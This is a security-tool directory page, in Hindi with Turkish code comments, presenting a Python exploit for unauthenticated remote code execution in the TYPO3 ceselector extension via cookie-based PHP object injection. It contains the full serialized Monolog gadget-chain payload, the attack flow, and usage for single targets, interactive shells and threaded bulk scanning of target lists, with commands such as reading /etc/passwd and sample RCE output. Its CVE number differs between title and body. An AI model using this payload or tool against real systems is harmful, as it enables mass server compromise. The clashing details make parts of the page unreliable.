Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-46275 — # CVE-2026-46725 के लिए Python एक्सप्लॉइट, TYPO3 ceselector एक्सटेंशन में PHP ऑब्जेक्ट इंजेक्शन और Monolog गैजेट चेन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन प्राप्त करना। | Kitploit
उपकरण/GitHubGitHub/xxconi/cve-2026-46275
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubxxconi/cve-2026-46275

CVE-2026-46275

# CVE-2026-46725 के लिए Python एक्सप्लॉइट, TYPO3 ceselector एक्सटेंशन में PHP ऑब्जेक्ट इंजेक्शन और Monolog गैजेट चेन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन प्राप्त करना।

रिपॉजिटरी देखें
53 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-46725 — TYPO3 ceselector एक्सटेंशन RCE

PHP ऑब्जेक्ट इंजेक्शन unserialize() कुकी बाइपास के माध्यम से → रिमोट कोड एक्ज़ीक्यूशन

CVSS CWE Auth Python License


📋 सामग्री सूची

  • भेद्यता के बारे में
  • तकनीकी विवरण
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • उदाहरण
  • आउटपुट प्रारूप
  • यह कैसे काम करता है
संदर्भ
  • कानूनी चेतावनी

  • 🔍 भेद्यता के बारे में

    फ़ील्डविवरण
    CVE IDCVE-2026-46725
    उत्पादTYPO3 ceselector एक्सटेंशन (mmc/ceselector)
    प्रभावित संस्करण<= 1.1.3
    भेद्यता प्रकारअसुरक्षित डिसीरियलाइज़ेशन (PHP Object Injection)
    CVSS स्कोर9.8 Critical
    CVSS वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-502 (Deserialization of Untrusted Data)
    EPSS स्कोर0.0046 (%64.3 percentile)
    प्रमाणीकरणआवश्यक नहीं (Unauthenticated)
    प्रभावFull RCE — सिस्टम का पूर्ण नियंत्रण
    शोधकर्ताDhiyaneshDk

    विवरण

    TYPO3 ceselector एक्सटेंशन, T3_ceselector_* नामक कुकी मान को बिना किसी सत्यापन के सीधे unserialize() फ़ंक्शन में पास करता है। हमलावर इस कुकी में विशेष रूप से तैयार PHP Object Injection पेलोड डालकर सर्वर पर मनमाना कमांड चला सकता है।

    ⚠️ पूर्वापेक्षा: भेद्यता का शोषण करने के लिए TYPO3 कॉन्फ़िगरेशन में Persistent Mode: Static सेटिंग का सक्रिय होना आवश्यक है।


    🔧 तकनीकी विवरण

    हमले का प्रवाह

    root@kitploit:~
    1. GET /  →  Sunucu Set-Cookie: T3_ceselector_<id>=<value> döner
    2. GET /  →  Cookie: T3_ceselector_<id>=<PAYLOAD>
                 └─ PHP unserialize() tetiklenir
                 └─ Monolog Gadget Chain çalışır
                 └─ system("id") çıktısı response'a yansır
    

    Gadget Chain

    root@kitploit:~
    Monolog\Handler\GroupHandler
      └─ Monolog\Handler\BufferHandler
           └─ Monolog\LogRecord (buffer)
                └─ processors: [get_object_vars, end, system]
                     └─ system("<CMD>")  ← RCE
    

    पेलोड संरचना

    root@kitploit:~
    O:28:"Monolog\Handler\GroupHandler":1:{
      s:11:"*handlers";a:1:{
        i:0;O:29:"Monolog\Handler\BufferHandler":6:{
          s:10:"*handler";r:3;
          s:13:"*bufferSize";i:1;
          s:14:"*bufferLimit";i:0;
          s:9:"*buffer";a:1:{
            i:0;O:17:"Monolog\LogRecord":2:{
              s:5:"level";E:19:"Monolog\Level:Debug";
              s:5:"mixed";s:2:"id";   ← OS komutu buraya
            }
          }
          s:14:"*initialized";b:1;
          s:13:"*processors";a:3:{
            i:0;s:15:"get_object_vars";
            i:1;s:3:"end";
            i:2;s:6:"system";   ← sink
          }
        }
      }
    }
    

    📦 आवश्यकताएँ

    • Python 3.8+
    • requests लाइब्रेरी
    root@kitploit:~
    Python >= 3.8
    requests >= 2.28.0
    

    ⚙️ स्थापना

    root@kitploit:~
    # Repoyu klonla
    git clone https://github.com/example/CVE-2026-46725
    cd CVE-2026-46725
    
    # Bağımlılıkları yükle
    pip install requests
    
    # veya requirements.txt ile
    pip install -r requirements.txt
    

    requirements.txt

    root@kitploit:~
    requests>=2.28.0
    urllib3>=1.26.0
    

    🚀 उपयोग

    root@kitploit:~
    usage: CVE-2026-46725 [-h] (-u URL | -l FILE) [-c CMD] [-i]
                          [-t N] [--timeout S] [--proxy URL]
                          [-o FILE] [-v] [--no-color]
    
    options:
    Hedef:
      -u, --url URL       Tek hedef URL
      -l, --list FILE     Hedef listesi (satır başı URL)
    
    Exploit:
      -c, --cmd CMD       Çalıştırılacak OS komutu (varsayılan: id)
      -i, --interactive   Başarılı exploit sonrası interaktif shell aç
    
    Tarama:
      -t, --threads N     Thread sayısı (varsayılan: 10)
      --timeout S         Timeout saniye (varsayılan: 15)
      --proxy URL         Proxy (örn: http://127.0.0.1:8080)
    
    Çıktı:
      -o, --output FILE   Sonuç dosyası
      -v, --verbose       Ayrıntılı çıktı
      --no-color          Renksiz çıktı
    

    📌 उदाहरण

    एकल लक्ष्य — बुनियादी उपयोग

    root@kitploit:~
    python CVE-2026-46725.py -u https://typo3-site.com
    

    कस्टम कमांड चलाएँ

    root@kitploit:~
    python CVE-2026-46725.py -u https://typo3-site.com -c "whoami"
    python CVE-2026-46725.py -u https://typo3-site.com -c "cat /etc/passwd"
    python CVE-2026-46725.py -u https://typo3-site.com -c "uname -a"
    

    इंटरैक्टिव शेल

    root@kitploit:~
    python CVE-2026-46725.py -u https://typo3-site.com --interactive
    
    root@kitploit:~
    typo3@ceselector $ id
    │ uid=33(www-data) gid=33(www-data) groups=33(www-data)
    typo3@ceselector $ uname -a
    │ Linux web01 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
    typo3@ceselector $ pwd
    │ /var/www/html
    typo3@ceselector $ exit
    

    बल्क स्कैनिंग

    root@kitploit:~
    # 20 thread ile tara, sonuçları kaydet
    python CVE-2026-46725.py -l targets.txt -t 20 -o results.txt
    
    # 30 thread, özel komut
    python CVE-2026-46725.py -l targets.txt -t 30 -c "id"
    

    प्रॉक्सी के साथ (Burp Suite)

    root@kitploit:~
    python CVE-2026-46725.py -u https://typo3-site.com \
      --proxy http://127.0.0.1:8080 -v
    

    targets.txt प्रारूप

    root@kitploit:~
    https://site1.com
    https://site2.com
    http://site3.com
    site4.com
    

    📊 आउटपुट प्रारूप

    टर्मिनल आउटपुट

    root@kitploit:~
    ① TYPO3 & ceselector Tespit
    ────────────────────────────────────────────────────
    · TYPO3             ✓ Tespit edildi
    · ceselector        ✓ Aktif
    · Cookie Adı        T3_ceselector_48291
    · TYPO3 Sürüm       12.4.3
    
    ② Payload Hazırlanıyor
    ────────────────────────────────────────────────────
    · Teknik            PHP Object Injection → Monolog Gadget Chain
    · Gadget            Monolog\Handler\GroupHandler
    · Sink              system()
    · Komut             id
    
    ④ RCE Çıktısı
    ────────────────────────────────────────────────────
    ┌─ RCE ÇIKTISI ───────────────────────────────────
    │ uid=33(www-data) gid=33(www-data) groups=33(www-data)
    └─────────────────────────────────────────────────
    

    लॉग फ़ाइल (results.txt)

    root@kitploit:~
    ============================================================
    CVE-2026-46725 — TYPO3 ceselector RCE
    Tarih: 2026-05-26 17:30:00
    ============================================================
    
    [+] RCE ALINAN HEDEFLER (2)
    ----------------------------------------
    URL        : https://typo3-site.com
    Sürüm      : 12.4.3
    Cookie     : T3_ceselector_48291
    Komut      : id
    Çıktı      : uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    🔬 यह कैसे काम करता है

    root@kitploit:~
    ┌─────────────────────────────────────────────────────────┐
    │                    EXPLOIT AKIŞI                        │
    ├─────────────────────────────────────────────────────────┤
    │                                                         │
    │  1. TESPIT                                              │
    │     GET /  ──────────────────────► TYPO3 Sunucu        │
    │             ◄──── Set-Cookie: T3_ceselector_XXXXX ───── │
    │                                                         │
    │  2. PAYLOAD HAZIRLAMA                                   │
    │     build_payload("id")                                 │
    │     └─ Monolog gadget chain URL-encode edilir           │
    │                                                         │
    │  3. EXPLOIT                                             │
    │     GET /                                               │
    │     Cookie: T3_ceselector_XXXXX=O:28:"Monolog...        │
    │             ──────────────────────► unserialize()       │
    │                                    └─ __destruct()      │
    │                                    └─ system("id")      │
    │             ◄──── uid=33(www-data) gid=33(www-data) ─── │
    │                                                         │
    │  4. DOĞRULAMA                                           │
    │     regex: uid=\d+\([a-z_][a-z0-9_-]*\)\s+gid=...      │
    │                                                         │
    └─────────────────────────────────────────────────────────┘
    

    📚 संदर्भ

    • TYPO3 Security Advisory TYPO3-EXT-SA-2026-001
    • Packagist — mmc/ceselector
    • CWE-502: Deserialization of Untrusted Data
    • CVSS 3.1 Calculator

    ⚖️ कानूनी चेतावनी

    यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षणों के लिए विकसित किया गया है।

    • केवल अपने स्वयं के सिस्टम या जिन सिस्टमों के लिए आपके पास लिखित अनुमति है उन पर उपयोग करें।
    • बिना अनुमति के सिस्टम के विरुद्ध उपयोग करना अवैध है और इसके कानूनी परिणाम हो सकते हैं।
    • डेवलपर इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं ठहराया जा सकता।

    CVE-2026-46725 | TYPO3 ceselector RCE | Python Exploit

    टूल डाउनलोड करें